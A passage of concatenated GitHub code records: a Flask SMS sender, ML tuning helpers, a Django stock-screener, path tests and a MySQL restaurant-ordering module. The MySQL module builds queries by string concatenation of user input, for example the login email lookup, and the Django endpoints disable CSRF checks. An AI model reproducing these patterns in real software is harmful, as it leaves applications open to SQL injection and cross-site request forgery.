code\n\t\t\ttext=content,\n\t\t)\n\t\t# print(response)\n\t\treturn str(resp)\n\texcept plivo.exceptions.PlivoRestError as e:\n\t\tprint(e)\n\n@app.route('/send_message/', methods=['GET']) \ndef outbound_sms_template():\n\treturn render_template('test_sms_flask.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"pranav-plivo/send-sms","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14393499860","text":"from __future__ import annotations\n\nimport json\nimport pprint\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Any\n\nimport gnn_tracking\nimport optuna\nfrom gnn_tracking.utils.versioning import get_commit_hash\n\nfrom gnn_tracking_hpo.util.log import logger\n\n\ndef auto_suggest_if_not_fixed(\n key: str,\n config: dict[str, Any],\n trial: optuna.Trial,\n *args,\n **kwargs,\n) -> Any:\n \"\"\"Similar to ``suggest_if_not_fixed``, but automatically chooses the correct\n function.\n\n **Important**: It matters whether the argument types are ints or floats!\n \"\"\"\n if key in config:\n logger.debug(\"Already fixed %s to %s\", key, config[key])\n return\n if key in trial.params:\n logger.debug(\"Already fixed %s to %s\", key, config[key])\n return\n if len(args) == 2:\n if all(isinstance(x, int) for x in args):\n return trial.suggest_int(key, *args, **kwargs)\n else:\n return trial.suggest_float(key, *args, **kwargs)\n elif len(args) == 1:\n if isinstance(args[0], list):\n if all(isinstance(x, bool) for x in args[0]):\n # Careful because bools are ints\n pass\n elif all(isinstance(x, int) for x in args[0]):\n ma = max(args[0])\n mi = min(args[0])\n if ma - mi == len(args[0]) - 1:\n logger.warning(\n \"Substituting suggest_int from %s to %s instead of \"\n \"categorical %s\",\n mi,\n ma,\n args[0],\n )\n return trial.suggest_int(key, mi, ma)\n return trial.suggest_categorical(key, *args, **kwargs)\n return trial.suggest_categorical(key, *args, **kwargs)\n else:\n config[key] = args[0]\n return args[0]\n else:\n raise ValueError(\"Do not understand specification\")\n\n\ndef read_json(path: PathLike | str) -> dict[str, Any]:\n \"\"\"Open and read a json file\"\"\"\n with Path(path).open() as f:\n config = json.load(f)\n return config\n\n\ndef get_metadata(*, test=False):\n return {\n \"test\": test,\n \"gnn_tracking_hash\": get_commit_hash(gnn_tracking),\n \"gnn_tracking_experiments_hash\": get_commit_hash(Path(__file__).parent),\n }\n\n\ndef get_points_to_evaluate(\n paths: None | list[str] | list[PathLike] = None,\n) -> list[dict[str, Any]]:\n \"\"\"Read json files or read from wandb online and return a list of dicts.\n Json files can either contain dictionary (single config) or a list thereof.\n \"\"\"\n points_to_evaluate: list[dict[str, Any]] = []\n if paths is None:\n paths = list[str]()\n for path in paths:\n if isinstance(path, str) and \"/\" not in path and not Path(path).exists():\n logger.debug(\"Assuming that %s is a wandb hash\", path)\n # Assume it's a wandb hash\n points_to_evaluate.append(retrieve_config_from_wandb(str(path)))\n continue\n obj = read_json(path)\n if isinstance(obj, list):\n points_to_evaluate.extend(obj)\n elif isinstance(obj, dict):\n points_to_evaluate.append(obj)\n else:\n raise ValueError(\"Decoding of json file failed\")\n if points_to_evaluate:\n logger.info(\"Enqueued trials:\\n%s\", pprint.pformat(points_to_evaluate))\n return points_to_evaluate\n\n\ndef retrieve_config_from_wandb(hash: str) -> dict[str, Any]:\n \"\"\"Retrieve configuration of run from wandb based on (part of) a hash\"\"\"\n import wandb\n\n logger.debug(\"Attempting to retrieve config for hash %s from wandb\", hash)\n api = wandb.Api()\n run = api.run(f\"gnn_tracking/{hash}\")\n logger.debug(\"Obtained run with URL %s from wandb\", run.url)\n ignored_keys = [\n \"pid\",\n \"test\",\n \"node_ip\",\n \"trial_id\",\n \"experiment_id\",\n \"gnn_tracking_experiments_hash\",\n \"gnn_tracking_hash\",\n \"hostname\",\n \"date\",\n \"trial_log_path\",\n ]\n return {\n k: v\n for k, v in run.config.items()\n if not k.startswith(\"_\") and k not in ignored_keys\n }\n","repo_name":"gnn-tracking/hyperparameter_optimization","sub_path":"src/gnn_tracking_hpo/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"36449891366","text":"from types import ClassMethodDescriptorType\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.db import IntegrityError\nfrom .models import User, SavedSearch\nfrom django.conf import settings\nfrom django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport json\nimport os\n\nfrom datetime import date, datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\n\nimport plotly.graph_objects as go\n\nimport pandas as pd\nimport yfinance as yf\nimport string\n\nfrom .utils import get_change_info, make_graph_1, make_graph_2, prep_graph_data, get_SP_500_dict\n\nsp500 = get_SP_500_dict()\n\nclass StockForm(forms.Form):\n stock = forms.CharField(label = 'Stock name', max_length=5, widget=forms.TextInput(attrs={'autofocus': True, 'placeholder':'AAPL'})) \n \ndef index(request):\n\n if request.method == \"GET\": \n return render (request, \"stockscreener/index.html\", {\"stockForm\": StockForm()})\n \n if request.method == \"POST\":\n if 'stock' in request.POST:\n stockForm = StockForm(request.POST) \n if stockForm.is_valid():\n stock = stockForm.cleaned_data['stock'].upper()\n \n if stock not in sp500:\n message = \"Sorry, this ticker does not appear to be in S&P 500\"\n context = {\n \"message\":message, \n \"stockForm\": StockForm\n }\n return render (request, \"stockscreener/index.html\", context)\n \n else:\n data1, data2 = prep_graph_data(stock)\n stockFull = sp500[stock] \n closing_price, change = get_change_info(data1, stock)\n graph1 = make_graph_1(data1, stock, 470, 630)\n graph2 = make_graph_2(data2, stock, 470, 630)\n watchlisted = False\n stockID = None\n\n if request.user.is_authenticated:\n searchObj = SavedSearch.objects.filter(user = request.user, stock = stock)\n if len(searchObj): \n watchlisted = True\n stockID = searchObj[0].id\n\n context = {\n \"stockForm\": stockForm, \n \"stock\":stock,\n \"stockFull\":stockFull,\n \"stockID\":stockID,\n \"closing_price\":closing_price,\n \"change\": change,\n \"watchlisted\":watchlisted, \n \"graph1\":graph1, \n \"graph2\":graph2\n }\n \n return render(request, \"stockscreener/index.html\", context)\n\ndef ticker_list(request):\n abcTickers = {}\n abc = string.ascii_uppercase\n for letter in abc:\n abcTickers[letter]=[]\n for key, value in sorted(sp500.items()):\n if key.startswith(letter):\n abcTickers[letter].append([key, value])\n abcTickers[letter] = sorted(abcTickers[letter])\n sp500abc = sorted(abcTickers.items())\n return render(request, \"stockscreener/ticker_list.html\", {\"sp500abc\":sp500abc})\n\ndef about(request):\n return render(request, \"stockscreener/about.html\")\n \ndef login_view(request):\n if request.method == \"POST\":\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username = username, password = password)\n\n # Check if authentication is successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"stockscreener/login.html\", {\"message\":\"Invalid username and/or password\"})\n else:\n return render(request, \"stockscreener/login.html\")\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Make sure password matches password confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"stockscreener/register.html\", {\n \"message\":\"Please make sure the passwords match\"\n })\n\n # Attempt to create a new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"stockscreener/register.html\",{\n \"message\":\"Sorry, this username is not available\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"stockscreener/register.html\")\n \n@login_required\ndef watchlist(request):\n if request.method == \"GET\":\n \n if request.user.is_authenticated:\n\n watched_stocks = [] \n watchlist=SavedSearch.objects.filter(user=request.user) \n watchlist=sorted(watchlist, key = lambda p: (p.date), reverse=True)\n\n for item in watchlist: \n stock = item.stock \n watchlist_temp = {} \n watchlist_temp[\"stock\"] = stock\n watchlist_temp[\"stockFull\"] = item.stock_full\n watchlist_temp[\"notes\"] = item.notes \n watchlist_temp[\"stockID\"]= item.id \n watchlist_temp[\"data1\"], watchlist_temp[\"data2\"] = prep_graph_data(stock) \n watchlist_temp[\"closing_price\"], watchlist_temp[\"change\"] = get_change_info(watchlist_temp[\"data1\"], stock) \n watchlist_temp[\"graph1\"] = make_graph_1(watchlist_temp[\"data1\"], stock, 575, 840) \n watchlist_temp[\"graph2\"] = make_graph_2(watchlist_temp[\"data2\"], stock, 575, 840) \n \n watched_stocks.append(watchlist_temp) \n \n return render(request, \"stockscreener/watchlist.html\", {'watched_stocks':watched_stocks})\n\n@csrf_exempt\n@login_required\ndef saved_searches(request):\n\n # Creating a new saved search must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Check received data emails\n data = json.loads(request.body)\n \n stock = data.get(\"stock\")\n if stock == [\"\"]:\n return JsonResponse({\n \"error\": \"Stock name is required.\"\n }, status=400)\n \n # Create a saved search for the logged in user \n savedSearch = SavedSearch(\n user = request.user,\n stock = stock,\n stock_full = sp500[stock], \n )\n savedSearch.save()\n search_id = savedSearch.id \n return JsonResponse({\"message\": \"Search saved successfully\", \"id\":search_id}, status=201)\n\n@csrf_exempt\n@login_required\ndef saved_search(request, search_id):\n \n # Query for requested search\n try:\n search = SavedSearch.objects.get(user=request.user, pk=search_id)\n except SavedSearch.DoesNotExist:\n return JsonResponse({\"error\": \"No such search has been saved for this user.\"}, status=404)\n\n # Return saved search contents\n if request.method == \"GET\":\n return JsonResponse(search.serialize())\n\n # Update notes for the saved search\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n if data.get(\"notes\") is not None:\n search.notes = data[\"notes\"]\n search.save()\n return HttpResponse(status=204)\n\n elif request.method == \"DELETE\":\n search.delete()\n return HttpResponse(status=204)\n\n # Search must be via GET, PUT or DELETE\n else:\n return JsonResponse({\n \"error\": \"GET, PUT or DELETE request required.\"\n }, status=400)\n\n","repo_name":"ahsamt/StockScreener","sub_path":"stockscreener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26085216327","text":"from leezy import solution, Solution\n\n\nclass Q215(Solution):\n @solution\n def findKthLargest(self, nums, k):\n # 从右向左求的最大,也可以将最大k转成最小K\n def quick_sort(lo, hi, k):\n # if lo >= hi:\n # return\n pivot = nums[lo]\n i, j = lo+1, hi\n while True:\n while i <= hi and nums[i] < pivot:\n i += 1\n while nums[j] > pivot:\n j -= 1\n if i >= j:\n break\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j -= 1\n nums[lo], nums[j] = nums[j], nums[lo]\n big_cnt = hi - j + 1\n if big_cnt == k:\n return nums[j]\n if big_cnt > k:\n return quick_sort(j+1, hi, k)\n else:\n return quick_sort(lo, j-1, k-big_cnt)\n\n return quick_sort(0, len(nums)-1, k)\n\n\ndef main():\n q = Q215()\n q.add_case(q.case([3, 2, 1, 5, 6, 4], 2).assert_equal(5))\n q.add_case(q.case([3,2,3,1,2,4,5,5,6], 4).assert_equal(4))\n q.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wowococo/myleetcode","sub_path":"Python/215 - Kth Largest Element in an Array/215_kth-largest-element-in-an-array.py","file_name":"215_kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20838704965","text":"\"\"\"\nTesting util.Path\n\"\"\"\n\n# pylint: disable=missing-function-docstring\n\nimport pytest\n\nfrom moat.util import P, Path, packer, unpacker, yformat, yload\n\n_valid = (\n ((\"a\", \"b\", \"c\"), \"a.b.c\"),\n ((\"a\", 2, \"c\"), \"a:2.c\"),\n ((2, \"c\"), (\":i2.c\", \":2.c\")),\n ((True, \"c\"), \":t.c\"),\n ((1.23, \"c\"), \":1:.23.c\"),\n ((\"\", 1.23, \"c\"), \":e:1:.23.c\"),\n ((\"a\", \"\", 1.23, \"c\"), \"a:e:1:.23.c\"),\n ((\"a\", \"\", 1.23), \"a:e:1:.23\"),\n ((\"a\", \"\", \"b\"), \"a:e.b\"),\n ((\"a\", \"x y\", \"b\"), (\"a.x y.b\", \"a.x:_y.b\")),\n ((\"a\", True), \"a:t\"),\n ((\"x\", None), \"x:n\"),\n ((31,), (\":x1f\", \":31\")),\n ((31, \"q\"), (\":x1f.q\", \":31.q\")),\n ((\"b\", 31, 5), (\"b:x1f:5\", \"b:31:5\")),\n (((1, 2), 1.23), (\":(1,2):1:.23\", \":1,2:1:.23\")),\n (((1, 2), \"\", 1.23), (\":(1,2):e:1:.23\", \":1,2:e:1:.23\")),\n (((1, 2), \"c\"), \":1,2.c\"),\n (((1, \"a b\", 2), \"c\"), (\":1,'a b',2.c\", \":1,'a:_b',2.c\")),\n ((), \":\"),\n ((\"a\", b\"abc\"), \"a:vabc\"),\n ((\"a\", b\"ab\\x99\"), (\"a:y616299\", \"a:sYWKZ\")),\n ((\"a\", b\"a b\"), \"a:va:_b\"),\n ((\"a\", b\"\", \"c\"), \"a:v.c\"),\n)\n\n_invalid = (\n \":w\",\n \":t:\",\n \"a.b:\",\n \":2..c\",\n \"a..b\",\n \"a.:1\",\n \"a.:t\",\n \":x1g\",\n \":x\",\n \".a.b\",\n \"a.b.\",\n \"a:h123\",\n \"\",\n \":list\",\n \":dict\",\n)\n\n\n@pytest.mark.parametrize(\"a,b\", _valid)\ndef test_valid_paths(a, b):\n if isinstance(b, tuple):\n b, xb = b\n else:\n xb = b\n assert str(Path(*a)) == xb\n assert a == tuple(Path.from_str(b))\n\n\n@pytest.mark.parametrize(\"a\", _invalid)\ndef test_invalid_paths(a):\n with pytest.raises(SyntaxError):\n Path.from_str(a)\n\n\ndef test_paths():\n p = P(\"a.b\")\n assert str(p) == \"a.b\"\n q = p | \"c\"\n assert str(p) == \"a.b\"\n assert str(q) == \"a.b.c\"\n r = p + ()\n assert p is r\n r = p + (\"c\", \"d\")\n assert str(p) == \"a.b\"\n assert str(r) == \"a.b.c.d\"\n pp = Path.build((\"a\", \"b\"))\n assert str(p) == str(pp)\n\n\ndef test_tagged():\n p = P(\":mfoo:\")\n assert p.mark == \"foo\"\n assert len(p) == 0\n p = Path()\n p.mark = \"bar\"\n assert str(p) == \":mbar:\"\n p = P(\"a:mx.b\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\":mx.a.b\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\":mx.a.b:mx\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\"a.b:mx\")\n assert p.mark == \"x\" # pylint: disable=no-member\n with pytest.raises(SyntaxError):\n P(\":mx.a:my.b\")\n with pytest.raises(SyntaxError):\n P(\"a:mx.b:my\")\n\n\ndef test_msgpack():\n d = (\"a\", 1, \"b\")\n m = packer(d)\n mm = unpacker(m)\n assert type(mm) is tuple # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n d = Path(\"a\", 1, \"b\")\n m = packer(d)\n mm = unpacker(m)\n assert type(mm) is Path # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n d = {\"Hello\": d}\n m = packer(d)\n mm = unpacker(m)\n assert type(mm[\"Hello\"]) is Path # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n\ndef test_yaml():\n a = Path.from_str(\"a.b.c\")\n b = \"!P a.b.c\\n...\\n\"\n assert yformat(a) == b\n assert yload(b) == a\n","repo_name":"M-o-a-T/moat-util","sub_path":"tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74161915997","text":"from __future__ import print_function\nimport mysql.connector\nfrom mysql.connector import errorcode\n\nimport utility_functions\n\n\ndef connectToDatabase():\n cnx = mysql.connector.connect(user='your_username', password='your_password',\n host='127.0.0.1', port='3306',\n database='app_schema')\n return cnx\n\n\ndef getRestaurantNameFromID(cnx, restaurantID):\n cursor = cnx.cursor()\n cursor.execute(\"SELECT restaurantName from restaurant where RestaurantID=\" + str(restaurantID))\n restaurantNameTuple = cursor.fetchone()\n cursor.close()\n return restaurantNameTuple\n\n\ndef getLastOrderInfo(cnx):\n lastOrderId = getLastOrderId(cnx)\n cursor = cnx.cursor()\n # select all rows with orderId = lastOrderId\n cursor.execute('SELECT * from orders where orderID =' + str(lastOrderId))\n fetcAll = cursor.fetchall()\n cursor.close()\n return fetcAll\n\n\ndef getLastOrderId(cnx):\n cursor = cnx.cursor()\n cursor.execute('SELECT orderID FROM orders ORDER BY orderID DESC LIMIT 1')\n lastOrderInfo = cursor.fetchone()\n if lastOrderInfo is None:\n return 0\n else:\n return lastOrderInfo[0]\n\n\ndef getCustomerNameFromID(cnx, customerId):\n cursor = cnx.cursor()\n query = 'SELECT customerName FROM customer where customerID = ' + str(customerId)\n cursor.execute(query)\n customerName = cursor.fetchone()\n return customerName\n\n\ndef isValidUser(cnx, email, passoword):\n cursor = cnx.cursor()\n\n cursor.execute('SELECT * FROM customer where email =\"' + email + '\"')\n customerInfo = cursor.fetchone()\n if customerInfo is None:\n return (-1, None, None)\n else:\n passwordInDB = customerInfo[4]\n # compare entered password with passwordInDB\n isPasswordCorrect = utility_functions.checkPassword(passoword, passwordInDB)\n if not isPasswordCorrect:\n return (-2, None, None)\n else:\n return (1, customerInfo[0], customerInfo[1])\n cursor.close()\n\n\ndef showRestaurants(cnx):\n # written by Jose\n cursor = cnx.cursor()\n showRestQuery = ('SELECT * FROM Restaurant')\n cursor.execute(showRestQuery)\n result = cursor.fetchall()\n print('Restaurant ID Restaurants:\\n')\n for r in result:\n print(str(r[0]) + ' ' + r[1] + '\\n')\n cursor.close()\n\n\ndef isValidRestaurant(cnx, restaurantId):\n cursor = cnx.cursor()\n getRestaurant = 'SELECT * from Restaurant R where R.RestaurantID = ' + str(restaurantId)\n cursor.execute(getRestaurant)\n if cursor.fetchone() is None:\n return -1\n else:\n return 1\n\n\ndef getCustomerIDForOrder(cnx, orderID, restaurantId):\n cursor = cnx.cursor(buffered=True)\n query = \"SELECT customerID from orders where orderID=\" + str(orderID) + \" and restaurantId=\" + str(restaurantId)\n cursor.execute(query)\n customerIDTuple = cursor.fetchone()\n cursor.close()\n return customerIDTuple\n\n\ndef orderReady(cnx, orderId, restaurantId):\n cursor = cnx.cursor()\n updateisReady = \"UPDATE orderinfo SET isReady = 1 WHERE orderID=%s AND RestaurantID=%s\"\n values = (orderId, restaurantId)\n cursor.execute(updateisReady, values)\n cnx.commit()\n cursor.close()\n\n\ndef isValidItem(cnx, itemId, restaurantID):\n cursor = cnx.cursor(buffered=True)\n cursor.execute('SELECT * from Menu M where M.ItemID = ' + str(itemId) + ' and M.RestaurantID= ' + str(restaurantID))\n fetchedItem = cursor.fetchone()\n if fetchedItem is None:\n return (-1, None)\n else:\n # return the price of the item\n return (1, fetchedItem[3])\n\n\ndef getItemNameFromItemID(cnx, itemId, restaurantId):\n cursor = cnx.cursor()\n query = ('SELECT ItemName FROM Menu M, Restaurant R WHERE M.RestaurantID=R.RestaurantID AND R.RestaurantID=' + str(\n restaurantId) + ' AND M.ItemID=' + str(itemId))\n cursor.execute(query)\n resultItemName = cursor.fetchone()\n cursor.close()\n return resultItemName\n\n\ndef showRItems(cnx, RSelect):\n # written by Jose\n cursor = cnx.cursor()\n showRItemQuery = (\n 'SELECT ItemID, ItemName, Price FROM Menu M, Restaurant R WHERE M.RestaurantID=R.RestaurantID AND R.RestaurantID=' + RSelect)\n cursor.execute(showRItemQuery)\n result = cursor.fetchall()\n print('Menu for ' + RSelect + '\\n')\n print('Item ID: Item Name: Price: \\n')\n for r in result:\n print(str(r[0]) + ' ' + str(r[1]) + ' ' + str(r[2]) + '\\n')\n cursor.close()\n\n\ndef addOrder(cnx, orderId, restaurantId, itemId, quantity, custId):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_orders = (\"INSERT INTO orders \"\n \"(orderID, ItemID, RestaurantID, customerID, Quantity) \"\n \"VALUES (%s, %s, %s, %s, %s)\")\n values = (orderId, itemId, restaurantId, custId, quantity)\n cursor.execute(query_add_orders, values)\n cnx.commit()\n\n cursor.close()\n\n\ndef getOrdersForCustomer(cnx, customerID):\n cursor = cnx.cursor()\n query = 'SELECT orderID, ItemID, RestaurantID, Quantity FROM orders WHERE customerID=' + str(customerID)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef getOrdersForRestaurant(cnx, restuarntId):\n cursor = cnx.cursor()\n query = (\"SELECT * FROM orders where RestaurantID = \" + restuarntId)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef getLastNRowsFromOrdersTable(cnx, numRows):\n cursor = cnx.cursor()\n query = \"SELECT * FROM orders ORDER BY orderID DESC LIMIT \" + str(numRows)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef addOrderInfo(cnx, totalPrice, readyTime, orderId, restaurantId):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_orderInfo = (\"INSERT INTO orderinfo \"\n \"(orderID, isReady, readyTime, totalPrice, isOrderPickedUp, RestaurantID) \"\n \"VALUES (%s, %s, %s, %s, %s, %s)\")\n # orderExpirationDateTime = readyTime + 1 hr\n # we'll not implement expirationDateTime, instead we'll have a script/cronjob that runs at 3:00 am everyday and deletes all orders\n values = (orderId, 0, readyTime, totalPrice, 0, restaurantId)\n cursor.execute(query_add_orderInfo, values)\n cnx.commit()\n\n cursor.close()\n\n\ndef getReadyTimeForOrder(cnx, orderId, RestaurantID):\n cursor = cnx.cursor(buffered=True)\n query = 'SELECT readyTime from orderinfo where orderID=' + str(orderId) + ' AND RestaurantID=' + str(RestaurantID)\n cursor.execute(query)\n readyTimeTuple = cursor.fetchone()\n cursor.close()\n return readyTimeTuple\n\n\ndef addAccount(cnx, balance):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_account = (\"INSERT INTO account \"\n \"(balance) \"\n \"VALUES (%s)\")\n values = (balance,)\n cursor.execute(query_add_account, values)\n cnx.commit()\n\n cursor.close()\n\n cursor = cnx.cursor()\n count_number_of_accounts_query = \"SELECT COUNT(*) FROM account\"\n cursor.execute(count_number_of_accounts_query)\n numberofRows = cursor.fetchone()[0]\n\n # numberofRows is equal to the account number recently created\n account_number = numberofRows\n\n cursor.close()\n\n return account_number\n\n\ndef addCustomer(cnx, name, email, passWord):\n # written by Tarun\n cursor = cnx.cursor()\n # first create an account\n\n # first check if the email already exists\n\n # we'll need a function to ask how much money they want to put in their account, maybe implement payments -> currently giving a hardcoded value\n account_number = addAccount(cnx, 0)\n\n query_add_customer = (\"INSERT INTO customer \"\n \"(customerName, accountNo, email, pass) \"\n \"VALUES (%s, %s, %s, %s)\")\n\n # add email validation -> https://www.geeksforgeeks.org/check-if-email-address-valid-or-not-in-python/\n data_customer = (name, account_number, email, passWord)\n cursor.execute(query_add_customer, data_customer)\n cnx.commit()\n\n cursor.close()\n\n\ndef cancelOrder(cnx, orderID,\n restaurantID): # cancel order (delete order and notify about cancellation) - written by Jose\n # refund order\n cursor = cnx.cursor(buffered=True)\n\n getTotalPriceQuery = (\n 'SELECT O.totalPrice FROM orderinfo O WHERE O.orderID=' + str(orderID) + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getTotalPriceQuery)\n try:\n totalp = cursor.fetchone()[0]\n except:\n print(\"Order Not Found. Please ensure Restaurant and Order IDs are both valid.\")\n return 0\n\n getBalanceQuery = ('SELECT A.balance FROM account A, orders O, customer C WHERE O.orderID=' + str(\n orderID) + ' AND O.customerID=C.customerID AND C.accountNo=A.accountNo' + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getBalanceQuery)\n balan = cursor.fetchone()[0]\n\n getAccountQuery = ('SELECT A.accountNo FROM account A, orders O, customer C WHERE O.orderID=' + str(\n orderID) + ' AND O.customerID=C.customerID AND C.accountNo=A.accountNo' + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getAccountQuery)\n AccountNo = cursor.fetchone()[0]\n\n totalp = float(totalp)\n balan = float(balan)\n balan = balan + totalp\n updateBalanceQuery = ('UPDATE account SET balance=' + str(balan) + ' WHERE accountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n\n deleteOrderQuery = ('DELETE FROM orders WHERE orderID=' + str(orderID) + ' AND RestaurantID=' + str(restaurantID))\n cursor.execute(deleteOrderQuery)\n cnx.commit()\n orderDeleteParityCheck(cnx)\n\n cursor.close()\n print('Order ' + str(orderID) + ' from restaurant ' + str(restaurantID) + ' has been canceled and refunded.\\n')\n\n\n# written by Jose\ndef setOrderPickedup(cnx, orderId):\n # Let restaurant change bool pickedup to 1 (true) Check if picked up is true, if so then delete order from order info and orders tables\n cursor = cnx.cursor()\n setPickedUpQuery = ('UPDATE orderinfo SET isOrderPickedUp=1 WHERE orderID=' + str(orderId))\n cursor.execute(setPickedUpQuery)\n cnx.commit()\n cursor.close()\n print('Order ' + str(orderId) + ' has been picked up.\\n')\n\n\n# written by Jose\ndef clearPickedOrders(cnx):\n cursor = cnx.cursor()\n clearPickedQuery = ('DELETE FROM orderinfo WHERE isOrderPickedUp=1')\n cursor.execute(clearPickedQuery)\n cnx.commit()\n orderDeleteParityCheck(cnx)\n cursor.close()\n print('Cleared\\n')\n\n\n# written by Jose, ensures that there are no orphaned Order or orderinfo tables when a row in either is deleted.\ndef orderDeleteParityCheck(cnx):\n cursor = cnx.cursor()\n selectOrdersQuery = ('SELECT orderID FROM orders')\n cursor.execute(selectOrdersQuery)\n ord1 = cursor.fetchall()\n selectOrderInfosQuery = ('SELECT orderID FROM orderinfo')\n cursor.execute(selectOrderInfosQuery)\n ord2 = cursor.fetchall()\n\n match = 0\n for x in ord1:\n for y in ord2:\n if x[0] == y[0]:\n match = 1\n if match == 0:\n deleteOrderQuery = ('DELETE FROM orders WHERE orderID=' + str(x[0]))\n cursor.execute(deleteOrderQuery)\n cnx.commit()\n\n match = 0\n for x in ord2:\n for y in ord1:\n if x[0] == y[0]:\n match = 1\n if match == 0:\n deleteOrderInfoQuery = ('DELETE FROM orderinfo WHERE orderID=' + str(x[0]))\n cursor.execute(deleteOrderInfoQuery)\n cnx.commit()\n cursor.close()\n\n\n# pay for order - written by Jose\ndef payOrder(cnx, total, customerID):\n cursor = cnx.cursor()\n # access account balance\n getAccountNoQuery = ('SELECT A.accountNo FROM account A, customer C WHERE A.accountNo=C.accountNo AND C.customerID='+ str(customerID))\n cursor.execute(getAccountNoQuery)\n AccountNo = cursor.fetchone()[0]\n cursor.execute('SELECT balance FROM account A WHERE A.accountNo=' + str(AccountNo))\n balance = cursor.fetchone()[0]\n balance = float(balance)\n total = float(total)\n # if, order total is greater than account balance, then decline order\n if total > balance:\n print('Insufficient funds in account, order cancelled.\\n')\n cursor.close()\n return False\n # else, decrease balance by order total\n else:\n balance -= total\n updateBalanceQuery = ('UPDATE Account SET balance=' + str(balance) + ' WHERE AccountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n cnx.commit()\n # notify that payment went through\n print('Payment processed.')\n cursor.close()\n return True\n\n#view and add money to account balance - written by Jose\ndef balanceFunc(cnx, customerID):\n cursor = cnx.cursor()\n #access account balance\n getAccountNoQuery = ('SELECT A.accountNo FROM Account A, Customer C WHERE A.accountNo=C.accountNo AND C.customerID=' + str(customerID))\n cursor.execute(getAccountNoQuery)\n AccountNo = cursor.fetchone()[0]\n getBalanceQuery = ('SELECT balance FROM Account A WHERE A.accountNo=' + str(AccountNo))\n cursor.execute(getBalanceQuery)\n balance = cursor.fetchone()[0]\n balance = float(balance)\n print(\"Current account balance: $\" + str(balance) + \"\\n\")\n command = input(\"Would you like to change your account balance? Y/N: \\n\")\n if command == 'Y':\n newbalance = input(\"Enter amount to be added \\n\")\n newbalance=float(newbalance)\n if newbalance<0:\n print(\"Please enter an amount > 0\")\n return\n balance+=newbalance\n updateBalanceQuery = ('UPDATE Account SET balance=' + str(balance) + ' WHERE accountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n cnx.commit()\n print(\"$\"+str(newbalance)+\" added to your account.\")\n print(\"New balance is: $\"+str(balance))\n\n\n","repo_name":"QELiminate/Database-Project","sub_path":"database_operations.py","file_name":"database_operations.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24928018801","text":"#!/usr/bin/env python3\nSTART_AGE = 60\nCHARGE_PERCENT = 0.45\nINFLATION = 2\n\n\nclass Drawdown:\n def __init__(self, pension_pot, annual_income, growth_percent):\n self.draw_down = {0: (pension_pot, START_AGE)}\n for i in range(1, 400):\n current_pot, current_age = self.draw_down[i - 1]\n calc_val = (current_pot - annual_income / 12) * (1 + (growth_percent - CHARGE_PERCENT) / (100 * 12))\n if calc_val < 0:\n break\n else:\n self.draw_down[i] = (calc_val, current_age + 1/12)\n self.final_age = START_AGE + 1/12 * i\n\n def print_results(self):\n for k, v in self.draw_down.items():\n pot, age = v\n print(str(k).ljust(4), str(round(age, 2)).ljust(6), str(round(pot, 2)))\n\n def any_left(self, age):\n return self.final_age >= age\n\n\nclass Compound:\n def 